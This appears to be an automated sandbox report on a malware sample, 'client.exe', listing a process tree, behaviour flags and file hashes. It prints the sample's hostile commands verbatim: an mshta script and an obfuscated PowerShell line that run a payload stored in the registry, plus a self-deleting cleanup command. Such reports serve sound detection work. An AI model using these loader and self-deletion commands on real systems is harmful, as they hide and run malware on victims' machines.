Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 4036 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 4036 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 5104 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 5104 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 5104 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 5104 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 3292 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 3292 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 3292 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 3292 3236 Explorer.EXE RuntimeBroker.exe PID 3236 wrote to memory of 4136 3236 Explorer.EXE cmd.exe PID 3236 wrote to memory of 4136 3236 Explorer.EXE cmd.exe PID 3236 wrote to memory of 4136 3236 Explorer.EXE cmd.exe PID 3236 wrote to memory of 2980 3236 Explorer.EXE cmd.exe PID 3236 wrote to memory of 2980 3236 Explorer.EXE cmd.exe PID 3236 wrote to memory of 2980 3236 Explorer.EXE cmd.exe PID 3236 wrote to memory of 2980 3236 Explorer.EXE cmd.exe PID 3236 wrote to memory of 4136 3236 Explorer.EXE cmd.exe PID 3236 wrote to memory of 4136 3236 Explorer.EXE cmd.exe PID 3236 wrote to memory of 2980 3236 Explorer.EXE cmd.exe PID 3236 wrote to memory of 2980 3236 Explorer.EXE cmd.exe PID 4136 wrote to memory of 4240 4136 cmd.exe PING.EXE PID 4136 wrote to memory of 4240 4136 cmd.exe PING.EXE PID 4136 wrote to memory of 4240 4136 cmd.exe PING.EXE PID 4136 wrote to memory of 4240 4136 cmd.exe PING.EXE PID 4136 wrote to memory of 4240 4136 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3692
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5104
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4036
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\client.exe"C:\Users\Admin\AppData\Local\Temp\client.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5024 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 14083⤵
- Program crash
PID:3028 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Whqj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Whqj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9\\\ActiveStart'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name oegyky -value gp; new-alias -name spwdolx -value iex; spwdolx ([System.Text.Encoding]::ASCII.GetString((oegyky "HKCU:Software\AppDataLow\Software\Microsoft\47C55FEA-FA41-11E9-3C6B-CED530CFE2D9").ClassFile))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fjdlvfxf\fjdlvfxf.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2DB2.tmp" "c:\Users\Admin\AppData\Local\Temp\fjdlvfxf\CSC26A2A30D916F47529E294BC4A9AADF8C.TMP"5⤵PID:3028
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\spi5ik2e\spi5ik2e.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2EAC.tmp" "c:\Users\Admin\AppData\Local\Temp\spi5ik2e\CSCA29338F38CFA493F814D92A9E0CF4B85.TMP"5⤵PID:2948
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4240 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:2980
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3292
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5024 -ip 50241⤵PID:3628
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵PID:3784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2396
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d0797dd4dc47cf0c1a7be209504ce79d
SHA1464608e1a051ce63dc66e251cceb9e34e3f9095d
SHA256fa4605db4cb5128b2cf2b9676a6af38cd024eb6a521410dc9b1510ca8a20e95e
SHA5127bed6da9c9ad80edbfa710a0a8dc8ea1dea48f40a8c66a8d1880592acd33eb9fa99a98c8b4bfb1b7a5bd92f0db670d3dbc5d88258ea5d12501b9ec4db7f38df1
-
Filesize
1KB
MD5d93999df7d8958a7714716dc34b442fa
SHA11fb97f504b50304a7af1ff59139eca488d9d7781
SHA256dd2bf541028a3a2d116f5b5d15c5f7e6694fedfa448c528418ae828e67a2d9d3
SHA512a0e2283900560c622bd4842767d0aa20c3eab54ee4273f91993a2bfe5c80ade307222357f537cb60e30529c5527d8c689bb393adf46b6419d07db9ad06acbdb9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD54db221229b295dd85d4702dd3c05067d
SHA1a5fca01ff5b9c200b23458f6fee5d104236c554c
SHA256de691309a6fcd0bb8ecec167037798205a4ebc1e24712bbfb508b4401a86beee
SHA512255693fd56ab6ce552014f7609ba7c848f001ce0004fcfeb071b4c82a55d7db4fa6f81f4d83791da49ccc20654f4ea0ef8c0e28a6e0ccd0656260a523b98d1bd
-
Filesize
3KB
MD5ecd127f8d0e1361593df5d94c749b748
SHA10c1844ad7ac787acc114db057ea0dacda6b4a01f
SHA256eb3b351b36c1d037ae3f7eb089a35c0149cc8c32d5a4013cad7543065e178842
SHA5128881b3f154dc8d2c18b23fc59b2a75429bbec7ebec7d75254cae11dc1305e2bf3a047a442accdd7a36fd83cfe03c8d1260bb529b663063d3e070a14baf2bab12
-
Filesize
652B
MD51e4ae792c9be392f7895100fbc24c7e0
SHA1f6dd23904d6fcd2125315c37767c23b1590c85c6
SHA2560b04e7a5d8be7edb4c511717729ead3f76c43bece086d61b186ba72167212135
SHA5122af6a46c40456cbe7e235918e48a5dd3547ceceb9826c08e0f7e84155d6da98585c08a8bbadbb83c4326642dfd4119a145f8cf8a39b15a7871239ec04fe1fdf5
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD59e0c703f8b69570e71891cb36117715f
SHA1a471cf555f462c0bd0d2955192ca5dd638c3bbfe
SHA2567bf046f588c56725e5aeddafe16ba09b2d91259638fa5ff78a4b83ba6452f54a
SHA5122d3f4278bcbe620e99594d5476d32dccd40011ca91f27ed0927bf1545dc4955876ac1b5a8be012a2e2347fc902a75f30a4be4c73a63e38695136d3a4a2b50fea
-
Filesize
652B
MD508b423c1e42688c9f77cf268e00631fc
SHA1cc70dc7121cb408f16ecb0017f939e12e1c2c3aa
SHA256e18f97b1b19b666e104c54fcdc56f307629570dc96d8f442ac52209a6f785eb4
SHA512f6f860b002c2e07f397f40f3401bf651f55e88a80bb4a8e45dd7d2c70dfa253e244d833d4038350a9edd16d8f484b059b3a630b599f6ebc75784a75e9b0546af
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD56a362f65e0aecb13dc345fc6704d3e21
SHA1096599a1354fea4a963280ac0c57b380bf571ed5
SHA2561d0e05d070468de96548b7d43d3ff76f48d70fe86a9abbd5ad4c4486005e2b66
SHA5128d40c8f8a0f430fda598f85bfa6a7c334949d04c556540f2c61797e15d01d5b4174923ce070b007045bda3fe4b6c827e2890553b6b216303b5f9427c8021f5dd